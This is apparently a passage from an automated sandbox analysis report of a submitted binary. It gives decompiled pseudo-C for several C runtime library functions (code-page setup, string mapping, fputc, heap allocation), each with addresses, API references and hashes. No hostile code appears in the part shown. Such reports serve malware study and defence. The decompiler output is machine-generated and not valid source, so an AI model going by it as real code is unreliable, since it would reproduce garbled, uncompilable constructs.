				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t89 = __edx;
				_t51 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t51 ^ _t96;
				_t95 = _a8;
				_t78 = E0138CE57(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E0138CEC8(_t95);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x13a3880)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t57 = GetCPInfo(_t78,  &_v28);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0x14a6118 - _t92;
											if( *0x14a6118 != _t92) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											_t14 = _t95 + 0x18; // 0x18
											E01379180(_t92, _t14, _t92, 0x101);
											 *(_t95 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t95 + _t88 + 0x19) =  *(_t95 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t25 = _t95 + 0x1a; // 0x1a
												_t76 = _t25;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												 *((intOrPtr*)(_t95 + 0x21c)) = E0138CE19( *(_t95 + 4));
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t95 + 4) = 0xfde9;
										 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t95 + 0x18)) = _t92;
										 *((short*)(_t95 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t95 + 8)) = _t92;
										_t12 = _t95 + 0xc; // 0xc
										_t92 = _t12;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E0138CF2D(_t90, _t95); // executed
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					_t28 = _t95 + 0x18; // 0x18
					E01379180(_t92, _t28, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x13a3890;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0x13a3878; // 0x8040201
										 *(_t95 + _t91 + 0x19) =  *(_t95 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t78;
					 *((intOrPtr*)(_t95 + 8)) = 1;
					 *((intOrPtr*)(_t95 + 0x21c)) = E0138CE19(_t78);
					_t46 = _t95 + 0xc; // 0xc
					_t85 = _t46;
					_t90 = _v36 + 0x13a3884;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t85 = _t85 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E01377F14(_t55, _t78, _v8 ^ _t96, _t89, _t92, _t95);
			}

0x0138d2bc
0x0138d2c4
0x0138d2cb
0x0138d2d0
0x0138d2dc
0x0138d2e1
0x0138d497
0x0138d498
0x00000000
0x0138d2e7
0x0138d2e7
0x0138d2e9
0x0138d2eb
0x0138d2ed
0x0138d2f0
0x0138d2fc
0x0138d2fd
0x0138d300
0x0138d308
0x00000000
0x0138d30a
0x0138d310
0x0138d3e7
0x0138d3e7
0x0138d316
0x0138d31a
0x0138d322
0x00000000
0x0138d328
0x0138d32f
0x0138d35c
0x0138d362
0x0138d364
0x0138d3db
0x0138d3e1
0x00000000
0x00000000
0x00000000
0x00000000
0x0138d366
0x0138d36b
0x0138d370
0x0138d378
0x0138d37b
0x0138d37f
0x0138d385
0x0138d387
0x0138d38b
0x0138d38e
0x0138d390
0x0138d390
0x0138d393
0x0138d395
0x00000000
0x00000000
0x0138d397
0x0138d39a
0x0138d3a5
0x0138d3a5
0x0138d3a7
0x00000000
0x00000000
0x0138d39f
0x0138d3a4
0x0138d3a4
0x0138d3a4
0x0138d3a9
0x0138d3ac
0x0138d3af
0x00000000
0x00000000
0x00000000
0x0138d3af
0x0138d390
0x0138d3b1
0x0138d3b1
0x0138d3b1
0x0138d3b4
0x0138d3b9
0x0138d3b9
0x0138d3bc
0x0138d3bd
0x0138d3bd
0x0138d3bd
0x0138d3cc
0x0138d3d5
0x0138d3d5
0x00000000
0x0138d385
0x0138d331
0x0138d331
0x0138d334
0x0138d33a
0x0138d33d
0x0138d341
0x0138d341
0x0138d346
0x0138d346
0x0138d349
0x0138d34a
0x0138d34b
0x0138d34c
0x0138d34d
0x0138d49d
0x0138d49d
0x0138d49f
0x0138d32f
0x0138d322
0x0138d310
0x00000000
0x0138d308
0x0138d3f4
0x0138d3f9
0x0138d401
0x0138d401
0x0138d405
0x0138d408
0x0138d40e
0x0138d411
0x0138d411
0x0138d414
0x0138d416
0x0138d418
0x0138d418
0x0138d41b
0x0138d41d
0x00000000
0x00000000
0x0138d41f
0x0138d422
0x0138d43e
0x0138d43e
0x0138d440
0x00000000
0x00000000
0x0138d427
0x0138d42d
0x0138d42f
0x0138d435
0x0138d439
0x0138d439
0x0138d43a
0x00000000
0x0138d43a
0x00000000
0x0138d42d
0x0138d442
0x0138d445
0x0138d448
0x00000000
0x00000000
0x00000000
0x0138d448
0x0138d44a
0x0138d44a
0x0138d44d
0x0138d44e
0x0138d451
0x0138d454
0x0138d454
0x0138d45a
0x0138d45d
0x0138d46c
0x0138d475
0x0138d475
0x0138d47a
0x0138d480
0x0138d481
0x0138d481
0x0138d484
0x0138d487
0x0138d48a
0x0138d48d
0x0138d48d
0x0138d48d
0x00000000
0x0138d492
0x0138d4a0
0x0138d4ae

APIs

Part of subcall function 0138CE57: GetOEMCP.KERNEL32(00000000,0138D0C8,00000000,00000000,01388943,01388943,00000000,00000000,00000000), ref: 0138CE82

IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,0138D10F,00000000,00000000,00000000,?,00000000,?,?,?,01388943), ref: 0138D31A
GetCPInfo.KERNEL32(00000000,0138D10F,?,?,0138D10F,00000000,00000000,00000000,?,00000000,?,?,?,01388943,00000000,00000000), ref: 0138D35C

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 98de2354918842b8cb0df970712890f25b865a5ec8dbcb52bccb76be97d84ea5
Instruction ID: 5df14e41ba0d436de6debada519ae82ff723a8aa768386ce6707da490e37fd3d
Opcode Fuzzy Hash: 98de2354918842b8cb0df970712890f25b865a5ec8dbcb52bccb76be97d84ea5
Instruction Fuzzy Hash: 465105709003459EDB21AFBAC4446EAFFF9EF91318F14406ED096976D1D6B4A145CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0138D0AD Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0138D0AD(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t37;
				signed int _t42;
				signed int _t46;
				char _t49;
				char _t56;
				signed int _t62;
				void* _t73;
				void* _t79;
				signed int _t84;

				_t77 = __edx;
				_push(_a16);
				_push(_a12);
				E0138D1C1(__ebx, __edx, __edi, __esi, __eflags);
				_t37 = E0138CE57(__eflags, _a4);
				_v16 = _t37;
				if(_t37 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t79 = E0138871A(0x220);
					_t62 = __ebx | 0xffffffff;
					__eflags = _t79;
					if(__eflags == 0) {
						L5:
						_t84 = _t62;
					} else {
						_t79 = memcpy(_t79,  *(_a12 + 0x48), 0x88 << 2);
						 *_t79 =  *_t79 & 0x00000000; // executed
						_t42 = E0138D2BC(_t77, __eflags, _v16, _t79); // executed
						_t84 = _t42;
						__eflags = _t84 - _t62;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E013837C5();
							}
							asm("lock xadd [eax], ebx");
							_t64 = _t62 == 1;
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								_t56 = _a12;
								__eflags =  *((intOrPtr*)(_t56 + 0x48)) - 0x13a3450;
								if( *((intOrPtr*)(_t56 + 0x48)) != 0x13a3450) {
									E013871B2( *((intOrPtr*)(_t56 + 0x48)));
								}
							}
							 *_t79 = 1;
							_t73 = _t79;
							_t79 = 0;
							 *(_a12 + 0x48) = _t73;
							_t46 =  *0x13a3280; // 0xfffffffe
							__eflags =  *(_a12 + 0x350) & _t46;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t49 = 5;
								_v16 = _t49;
								_v12 = _t49;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E0138CD49(_t64, 0, _t84, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x13a3264 =  *_a16;
								}
							}
						} else {
							 *((intOrPtr*)(E0137FD24(__eflags))) = 0x16;
							goto L5;
						}
					}
					E013871B2(_t79);
					return _t84;
				} else {
					return 0;
				}
			}

0x0138d0ad
0x0138d0b5
0x0138d0b8
0x0138d0bb
0x0138d0c3
0x0138d0ce
0x0138d0d7
0x0138d0dd
0x0138d0de
0x0138d0df
0x0138d0ea
0x0138d0ec
0x0138d0f0
0x0138d0f2
0x0138d122
0x0138d122
0x0138d0f4
0x0138d101
0x0138d107
0x0138d10a
0x0138d10f
0x0138d113
0x0138d115
0x0138d132
0x0138d136
0x0138d138
0x0138d138
0x0138d143
0x0138d147
0x0138d147
0x0138d148
0x0138d14a
0x0138d14d
0x0138d154
0x0138d159
0x0138d15e
0x0138d154
0x0138d15f
0x0138d165
0x0138d16a
0x0138d16c
0x0138d172
0x0138d177
0x0138d17d
0x0138d182
0x0138d18d
0x0138d190
0x0138d191
0x0138d194
0x0138d19a
0x0138d19e
0x0138d1a2
0x0138d1a3
0x0138d1a8
0x0138d1ac
0x0138d1b7
0x0138d1b7
0x0138d1ac
0x0138d117
0x0138d11c
0x00000000
0x0138d11c
0x0138d115
0x0138d125
0x0138d131
0x0138d0d9
0x0138d0dc
0x0138d0dc

APIs

Part of subcall function 0138CE57: GetOEMCP.KERNEL32(00000000,0138D0C8,00000000,00000000,01388943,01388943,00000000,00000000,00000000), ref: 0138CE82

_free.LIBCMT ref: 0138D125

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f84a07067e103deda50a5fc3e11f76f22590c8be3417861699be0aa18d71a799
Instruction ID: e8fcdac94a455f203c79bc166a33ae142653772d9f2354d427f358bb6473e4cb
Opcode Fuzzy Hash: f84a07067e103deda50a5fc3e11f76f22590c8be3417861699be0aa18d71a799
Instruction Fuzzy Hash: 8F319E7190030AAFDB51FFACD880ADA7BF5FF44328F10416AE9149B291EB32D951CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013885E9 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E013885E9(intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				void* _t20;
				intOrPtr* _t22;

				_t22 = E0138811F();
				if(_t22 == 0) {
					return LCMapStringW(E01388646(_a4, 0), _a8, _a12, _a16, _a20, _a24);
				}
				 *0x1394134(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
				_t20 =  *_t22(); // executed
				return _t20;
			}

0x013885f4
0x013885f8
0x00000000
0x0138863b
0x01388617
0x0138861d
0x00000000

APIs

LCMapStringEx.KERNELBASE(?,01387E36,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0138861D
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,01387E36,?,?,00000000,?,00000000), ref: 0138863B

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 31374d023d3644cfd7579928d5800507605f6e2f891deac6074a20b43fd4a193
Instruction ID: 60b72f5c23cf5557875740c8514d9491057b2438f615b6eba60560401840dd40
Opcode Fuzzy Hash: 31374d023d3644cfd7579928d5800507605f6e2f891deac6074a20b43fd4a193
Instruction Fuzzy Hash: 2EF07A3250021ABBCF226F94DD05DDE3F2AFF583A8F058150FA1965120CB36D932AB94

Uniqueness

Uniqueness Score: -1.00%

Function 01380A0D Relevance: 1.6, APIs: 1, Instructions: 117
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E01380A0D(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v16;
				char _v20;
				void* __edi;
				signed int _t23;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t37;
				signed int _t39;
				signed int _t43;
				void* _t48;
				void* _t68;
				void* _t71;
				signed int _t76;

				_t70 = __esi;
				_t68 = __edx;
				_t47 = __ebx;
				_t23 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t23 ^ _t76;
				_t69 = _a8;
				if(( *(_a8 + 0xc) >> 0x0000000c & 0x00000001) == 0) {
					_push(__ebx);
					_push(__esi);
					_t27 = E013891AE(_t69);
					_t48 = 0x13a3288;
					if(_t27 == 0xffffffff || E013891AE(_t69) == 0xfffffffe) {
						_t28 = _t48;
					} else {
						_t43 = E013891AE(_t69);
						_t28 =  *((intOrPtr*)(0x14a5e18 + (_t43 >> 6) * 4)) + (E013891AE(_t69) & 0x0000003f) * 0x38;
					}
					_t9 = _t28 + 0x29; // 0xa0a0a00
					_t29 =  *_t9;
					if(_t29 == 2 || _t29 == 1) {
						L18:
						_t30 = E013809DD(_a4, _t69);
					} else {
						if(E013891AE(_t69) != 0xffffffff && E013891AE(_t69) != 0xfffffffe) {
							_t39 = E013891AE(_t69);
							_t48 =  *((intOrPtr*)(0x14a5e18 + (_t39 >> 6) * 4)) + (E013891AE(_t69) & 0x0000003f) * 0x38;
						}
						if( *((char*)(_t48 + 0x28)) >= 0) {
							goto L18;
						} else {
							if(E01389695( &_v20,  &_v16, 5, _a4) != 0) {
								L17:
								_t30 = 0xffff;
							} else {
								_t71 = 0;
								if(_v20 <= 0) {
									L16:
									_t30 = _a4;
								} else {
									while(1) {
										_t37 = E013896B2( *((char*)(_t76 + _t71 - 0xc)), _t69); // executed
										if(_t37 == 0xffffffff) {
											goto L17;
										}
										_t71 = _t71 + 1;
										if(_t71 < _v20) {
											continue;
										} else {
											goto L16;
										}
										goto L19;
									}
									goto L17;
								}
							}
						}
					}
					L19:
					_pop(_t70);
					_pop(_t47);
				} else {
					_t30 = E013809DD(_a4, _t69);
				}
				return E01377F14(_t30, _t47, _v8 ^ _t76, _t68, _t69, _t70);
			}

0x01380a0d
0x01380a0d
0x01380a0d
0x01380a15
0x01380a1c
0x01380a20
0x01380a2c
0x01380a3e
0x01380a3f
0x01380a41
0x01380a46
0x01380a4f
0x01380a81
0x01380a5d
0x01380a5e
0x01380a7d
0x01380a7d
0x01380a83
0x01380a83
0x01380a88
0x01380b1c
0x01380b20
0x01380a96
0x01380aa0
0x01380aaf
0x01380ace
0x01380ace
0x01380ad4
0x00000000
0x01380ad6
0x01380aed
0x01380b15
0x01380b15
0x01380aef
0x01380aef
0x01380af4
0x01380b0f
0x01380b0f
0x01380af6
0x01380af6
0x01380afd
0x01380b07
0x00000000
0x00000000
0x01380b09
0x01380b0d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01380b0d
0x00000000
0x01380af6
0x01380af4
0x01380aed
0x01380ad4
0x01380b27
0x01380b27
0x01380b28
0x01380a2e
0x01380a32
0x01380a38
0x01380b35

APIs

__cftof.LIBCMT ref: 01380AE3

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: __cftof
String ID:
API String ID: 1622813385-0
Opcode ID: 2213851b12bcded154b9c1804aa3a936b6962c585c51c9f00c6e0adad9e63217
Instruction ID: 607f80ce3f8f83406e35d25e0fba95c4364733ce46571c488497a95cca0ba218
Opcode Fuzzy Hash: 2213851b12bcded154b9c1804aa3a936b6962c585c51c9f00c6e0adad9e63217
Instruction Fuzzy Hash: 69313D325483196AE71D7B3C9C85E7EBBACDF9563CB24031EF9219B0D0EA24D8478790

Uniqueness

Uniqueness Score: -1.00%

Function 01376CFB Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E01376CFB(void* __ecx, signed int* __edx, void* __esi, signed short _a4) {
				signed int _v8;
				char _v40;
				char _v42;
				signed short _v44;
				signed int _v48;
				char _v52;
				char _v56;
				void* __ebx;
				void* __edi;
				signed int _t33;
				signed int _t37;
				signed int _t40;
				signed int _t51;
				void* _t54;
				signed int _t55;
				signed int _t58;
				signed short _t60;
				signed int _t62;
				signed int* _t72;
				void* _t73;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;

				_t74 = __esi;
				_t72 = __edx;
				_t33 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t33 ^ _t80;
				_t60 = _a4;
				_t73 = __ecx;
				if(0xffff != _t60) {
					_push(__esi);
					_t62 =  *( *(__ecx + 0x20));
					__eflags = _t62;
					if(_t62 == 0) {
						L5:
						__eflags =  *(_t73 + 0x4c);
						if( *(_t73 + 0x4c) == 0) {
							L9:
							_t37 = 0xffff;
						} else {
							E01376979(_t73);
							_t40 =  *(_t73 + 0x38);
							_v48 = _t40;
							__eflags = _t40;
							if(__eflags != 0) {
								_v44 = _t60;
								 *0x1394134(_t73 + 0x40,  &_v44,  &_v42,  &_v56,  &_v40,  &_v8,  &_v52);
								_t51 =  *((intOrPtr*)( *((intOrPtr*)( *_t40 + 0x1c))))();
								__eflags = _t51;
								if(_t51 == 0) {
									L16:
									_t77 = _v52 -  &_v40;
									__eflags = _t77;
									if(_t77 == 0) {
										L18:
										 *((char*)(_t73 + 0x3e)) = 1;
										__eflags = _v56 -  &_v44;
										if(_v56 ==  &_v44) {
											goto L9;
										} else {
											goto L19;
										}
									} else {
										_t54 = E01381989(_t60, _t73, _t77,  &_v40, 1, _t77,  *(_t73 + 0x4c));
										__eflags = _t77 - _t54;
										if(_t77 != _t54) {
											goto L9;
										} else {
											goto L18;
										}
									}
								} else {
									_t55 = _t51 - 1;
									__eflags = _t55;
									if(_t55 == 0) {
										goto L16;
									} else {
										__eflags = _t55;
										if(__eflags != 0) {
											goto L9;
										} else {
											_push( *(_t73 + 0x4c));
											_push(_v44);
											goto L8;
										}
									}
								}
								L20:
							} else {
								_push( *(_t73 + 0x4c));
								_push(_t60); // executed
								L8:
								_t58 = E01376287(__eflags); // executed
								__eflags = _t58;
								_t37 = _t60 & 0x0000ffff;
								if(_t58 == 0) {
									goto L9;
								}
							}
						}
					} else {
						_t72 =  *(__ecx + 0x30);
						_t78 =  *_t72;
						__eflags = _t62 - _t62 + _t78 * 2;
						if(_t62 >= _t62 + _t78 * 2) {
							goto L5;
						} else {
							 *_t72 = _t78 - 1;
							_t72 =  *(__ecx + 0x20);
							_t79 =  *_t72;
							 *_t72 = _t79 + 2;
							 *_t79 = _t60;
							L19:
							_t37 = _t60;
						}
					}
					_pop(_t74);
				} else {
					_t37 = 0;
				}
				return E01377F14(_t37, _t60, _v8 ^ _t80, _t72, _t73, _t74);
				goto L20;
			}

0x01376cfb
0x01376cfb
0x01376d01
0x01376d08
0x01376d0c
0x01376d15
0x01376d1a
0x01376d23
0x01376d24
0x01376d26
0x01376d28
0x01376d4d
0x01376d4d
0x01376d51
0x01376d76
0x01376d76
0x01376d53
0x01376d55
0x01376d5a
0x01376d5d
0x01376d60
0x01376d62
0x01376d8c
0x01376db3
0x01376dbe
0x01376dbe
0x01376dc1
0x01376dd6
0x01376ddc
0x01376ddc
0x01376dde
0x01376df3
0x01376df6
0x01376dfa
0x01376dfd
0x00000000
0x00000000
0x00000000
0x00000000
0x01376de0
0x01376de7
0x01376def
0x01376df1
0x00000000
0x00000000
0x00000000
0x00000000
0x01376df1
0x01376dc3
0x01376dc3
0x01376dc3
0x01376dc6
0x00000000
0x01376dc8
0x01376dc9
0x01376dcc
0x00000000
0x01376dce
0x01376dce
0x01376dd1
0x00000000
0x01376dd1
0x01376dcc
0x01376dc6
0x00000000
0x01376d64
0x01376d64
0x01376d67
0x01376d68
0x01376d68
0x01376d6e
0x01376d70
0x01376d74
0x00000000
0x00000000
0x01376d74
0x01376d62
0x01376d2a
0x01376d2a
0x01376d2d
0x01376d32
0x01376d34
0x00000000
0x01376d36
0x01376d39
0x01376d3b
0x01376d3e
0x01376d43
0x01376d45
0x01376e03
0x01376e03
0x01376e03
0x01376d34
0x01376d7b
0x01376d1c
0x01376d1c
0x01376d1c
0x01376d89
0x00000000

APIs

_Fputc.LIBCPMT ref: 01376D68

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: Fputc
String ID:
API String ID: 3078413507-0
Opcode ID: 726d4426eadd2b12eb4d665b485755bb92f203c1462a19b9618ab53d982e8416
Instruction ID: 14e17d083dc896f09493da8dba988ba91c38f6198fca4c617bbf7ce9164941eb
Opcode Fuzzy Hash: 726d4426eadd2b12eb4d665b485755bb92f203c1462a19b9618ab53d982e8416
Instruction Fuzzy Hash: 463172B191091AEFEF25DFA8C5619EDB7B8FF09318B14012AD501A7650E735E984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0138D972 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0138D972(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E013858A2(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E01388527(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E013871B2(0);
				return _t35;
			}

0x0138d978
0x0138d97f
0x0138d984
0x0138d988
0x0138d98f
0x0138d995
0x0138d995
0x0138d99b
0x0138d99d
0x0138d9a0
0x0138d9a0
0x0138d9a3
0x0138d9a5
0x0138d9ab
0x0138d9af
0x0138d9b4
0x0138d9b8
0x0138d9bc
0x0138d9be
0x0138d9c1
0x0138d9c7
0x0138d9ce
0x0138d9d2
0x0138d9d5
0x0138d9d8
0x0138d9d8
0x0138d9dc
0x0138d9df
0x0138d991
0x0138d991
0x0138d991
0x0138d9e1
0x0138d9ec

APIs

Part of subcall function 013858A2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01385F13,00000001,00000364,00000002,000000FF,?,?,01378B75,?), ref: 013858E3

_free.LIBCMT ref: 0138D9E1

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
